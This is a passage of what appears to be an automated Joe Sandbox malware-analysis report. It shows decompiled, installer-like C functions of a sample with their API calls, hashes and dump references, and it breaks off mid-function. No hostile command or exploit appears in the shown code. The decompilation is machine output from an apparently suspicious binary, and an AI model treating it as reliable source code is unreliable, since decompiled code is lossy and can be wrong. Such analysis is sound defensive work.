                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2584051700-0
                                                                                      • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                      • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                      • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                      • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 59%
                                                                                      			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                      0x00401c43
                                                                                      0x00401c45
                                                                                      0x00401c4c
                                                                                      0x00401c4f
                                                                                      0x00401c52
                                                                                      0x00401c5c
                                                                                      0x00401c60
                                                                                      0x00401c63
                                                                                      0x00401c6c
                                                                                      0x00401c6c
                                                                                      0x00401c6f
                                                                                      0x00401c73
                                                                                      0x00401c7c
                                                                                      0x00401c7c
                                                                                      0x00401c7f
                                                                                      0x00401c83
                                                                                      0x00401c85
                                                                                      0x00401cda
                                                                                      0x00401cdc
                                                                                      0x00401ce7
                                                                                      0x00401cf1
                                                                                      0x00401cf4
                                                                                      0x00401cf4
                                                                                      0x00401cfd
                                                                                      0x00000000
                                                                                      0x00401c87
                                                                                      0x00401c8e
                                                                                      0x00401c90
                                                                                      0x00401c93
                                                                                      0x00401c99
                                                                                      0x00401ca0
                                                                                      0x00401ca3
                                                                                      0x00401ccb
                                                                                      0x00401d03
                                                                                      0x00401d03
                                                                                      0x00401ca5
                                                                                      0x00401cb3
                                                                                      0x00401cbb
                                                                                      0x00401cbe
                                                                                      0x00401cbe
                                                                                      0x00401ca3
                                                                                      0x00401d06
                                                                                      0x00401d09
                                                                                      0x00401d0f
                                                                                      0x00402ba4
                                                                                      0x00402ba4
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                      • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                      • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                      • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 77%
                                                                                      			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}



















                                                                                      0x00404d4f
                                                                                      0x00404d54
                                                                                      0x00404d5c
                                                                                      0x00404d5d
                                                                                      0x00404d6a
                                                                                      0x00404d72
                                                                                      0x00404d73
                                                                                      0x00404d75
                                                                                      0x00404d77
                                                                                      0x00404d79
                                                                                      0x00404d7c
                                                                                      0x00404d7c
                                                                                      0x00404d83
                                                                                      0x00404d89
                                                                                      0x00404d89
                                                                                      0x00404d90
                                                                                      0x00404d97
                                                                                      0x00404d9a
                                                                                      0x00404d9d
                                                                                      0x00404d9d
                                                                                      0x00404da1
                                                                                      0x00404db1
                                                                                      0x00404db3
                                                                                      0x00404db6
                                                                                      0x00404d5f
                                                                                      0x00404d5f
                                                                                      0x00404d66
                                                                                      0x00404d66
                                                                                      0x00404dbe
                                                                                      0x00404dc9
                                                                                      0x00404ddf
                                                                                      0x00404df0
                                                                                      0x00404e0c

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                                                      • wsprintfW.USER32 ref: 00404DF0
                                                                                      • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                      • String ID: %u.%u%s%s
                                                                                      • API String ID: 3540041739-3551169577
                                                                                      • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                      • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                      • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                                      • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405EB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405EB7(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405E39(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}









                                                                                      0x00405ec0
                                                                                      0x00405ec7
                                                                                      0x00405eca
                                                                                      0x00405ecc
                                                                                      0x00405ed2
                                                                                      0x00405eea
                                                                                      0x00405f0c
                                                                                      0x00000000
                                                                                      0x00405ef2
                                                                                      0x00405ef4
                                                                                      0x00405ef5
                                                                                      0x00405ef8
                                                                                      0x00405ef9
                                                                                      0x00405f02
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f05
                                                                                      0x00405f08
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405f08
                                                                                      0x00000000
                                                                                      0x00405ef5
                                                                                      0x00405ee1
                                                                                      0x00000000
                                                                                      0x00405ee2

                                                                                      APIs
                                                                                      • CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                      • CharNextW.USER32(00000000), ref: 00405ECA
                                                                                      • CharNextW.USER32(00000000), ref: 00405EE2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3213498283-3404278061
                                                                                      • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                      • Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
                                                                                      • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                                                                      • Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 58%
                                                                                      			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                      0x00405e0d
                                                                                      0x00405e1a
                                                                                      0x00405e1b
                                                                                      0x00405e26
                                                                                      0x00405e2e
                                                                                      0x00405e2e
                                                                                      0x00405e36

                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 2659869361-3355392842
                                                                                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                      • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                      • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 710310E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 91%
                                                                                      			E710310E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x7103506c = _a8;
				 *0x71035070 = _a16;
				 *0x71035074 = _a12;
				_a12( *0x71035048, E71031651, _t73);
				_t66 =  *0x7103506c +  *0x7103506c * 4 << 3;
				_t27 = E710312E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x71035040;
							if( *0x71035040 == 0) {
								goto L26;
							}
							E71031603( *0x71035074, _t31 + 4, _t66);
							_t34 =  *0x71035040;
							_t86 = _t86 + 0xc;
							 *0x71035040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E71031312(E7103135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E71031381(_t80, E710312E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E71031603(_t10,  *0x71035074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x71035040;
							 *0x71035040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x71035070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E71031603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x7103506c +  *0x7103506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E71031603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x71035070);
						 *( *0x71035070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}


























                                                                                      0x710310eb
                                                                                      0x71031100
                                                                                      0x71031109
                                                                                      0x7103110e
                                                                                      0x71031119
                                                                                      0x7103111c
                                                                                      0x71031125
                                                                                      0x71031129
                                                                                      0x7103112b
                                                                                      0x710312b0
                                                                                      0x710312ba
                                                                                      0x710312ba
                                                                                      0x71031132
                                                                                      0x71031132
                                                                                      0x71031137
                                                                                      0x71031138
                                                                                      0x7103113a
                                                                                      0x7103113d
                                                                                      0x71031256
                                                                                      0x71031259
                                                                                      0x71031271
                                                                                      0x71031271
                                                                                      0x71031278
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x71031285
                                                                                      0x7103128a
                                                                                      0x7103128f
                                                                                      0x71031294
                                                                                      0x7103129a
                                                                                      0x7103129b
                                                                                      0x00000000
                                                                                      0x7103129b
                                                                                      0x7103125b
                                                                                      0x7103125e
                                                                                      0x710311bc
                                                                                      0x710311bf
                                                                                      0x710311c2
                                                                                      0x710311cb
                                                                                      0x710311d0
                                                                                      0x00000000
                                                                                      0x710311d1
                                                                                      0x71031264
                                                                                      0x71031266
                                                                                      0x710311a2
                                                                                      0x710311a5
                                                                                      0x710311a8
                                                                                      0x710311b1
                                                                                      0x00000000
                                                                                      0x710311b1
                                                                                      0x71031164
                                                                                      0x71031165
                                                                                      0x71031177
                                                                                      0x71031180
                                                                                      0x71031184
                                                                                      0x7103118e
                                                                                      0x71031191
                                                                                      0x71031193
                                                                                      0x71031193
                                                                                      0x00000000
                                                                                      0x71031165
                                                                                      0x71031143
                                                                                      0x71031218
                                                                                      0x7103121d
                                                                                      0x71031221
                                                                                      0x71031223
                                                                                      0x7103122c
                                                                                      0x7103122f
                                                                                      0x71031238
                                                                                      0x7103123d
                                                                                      0x7103123d
                                                                                      0x71031247
                                                                                      0x7103124a
                                                                                      0x00000000
                                                                                      0x71031250
                                                                                      0x71031149
                                                                                      0x7103114c
                                                                                      0x710311e9
                                                                                      0x710311ed
                                                                                      0x710311f7
                                                                                      0x710311fb
                                                                                      0x71031205
                                                                                      0x7103120a
                                                                                      0x71031211
                                                                                      0x00000000
                                                                                      0x71031211
                                                                                      0x71031152
                                                                                      0x71031155
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x7103115b
                                                                                      0x7103115e
                                                                                      0x710311b8
                                                                                      0x00000000
                                                                                      0x710311b8
                                                                                      0x71031160
                                                                                      0x71031162
                                                                                      0x7103119e
                                                                                      0x00000000
                                                                                      0x7103119e
                                                                                      0x00000000
                                                                                      0x710312a1
                                                                                      0x710312a1
                                                                                      0x710312ab
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 71031171
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 710311E3
                                                                                      • GlobalFree.KERNEL32 ref: 7103124A
                                                                                      • GlobalFree.KERNEL32(?), ref: 7103129B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 710312B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26231651771.0000000071031000.00000020.00000001.01000000.00000004.sdmp, Offset: 71030000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26231597486.0000000071030000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231722184.0000000071034000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26231774806.0000000071036000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_71030000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc
                                                                                      • String ID:
                                                                                      • API String ID: 1780285237-0
                                                                                      • Opcode ID: 9f47247b5d1ee692b33a6a6c9b18e1120a38a5853d34ecaa04f873658fee350f
                                                                                      • Instruction ID: 249072bdda034d353ca432dc85b1ff47e4be65d200a4f2b56013507238e453a5
                                                                                      • Opcode Fuzzy Hash: 9f47247b5d1ee692b33a6a6c9b18e1120a38a5853d34ecaa04f873658fee350f
                                                                                      • Instruction Fuzzy Hash: 8351D2B6908202DFE700CF6AC944A65BBF9FF8CB14B90415DF946DB220EB32E910CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 92%
                                                                                      			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
